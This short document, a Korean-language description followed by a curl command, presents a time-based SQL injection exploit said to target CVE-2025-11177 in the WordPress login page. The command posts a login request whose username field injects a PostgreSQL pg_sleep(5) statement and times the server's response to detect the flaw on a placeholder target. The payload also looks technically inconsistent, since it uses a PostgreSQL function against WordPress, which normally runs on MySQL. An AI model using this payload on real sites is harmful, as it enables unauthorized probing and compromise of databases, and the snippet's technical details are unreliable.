
CVE-2025-11177을 대상으로 하는 시간 기반 SQL 인젝션 익스플로잇으로, WordPress 로그인을 겨냥하며 curl 기반 페이로드 전달 및 pg_sleep 타이밍 탐지를 사용합니다.
curl -w '\nTIME:%{time_total}\n' -s \
-d 'log=anything%27%3B%20SELECT%20pg_sleep(5)%3B%20--&pwd=irrelevant&wp-submit=Log+In' \
-d 'redirect_to=' \
-d 'testcookie=1' \
'http://{target}/wp-login.php'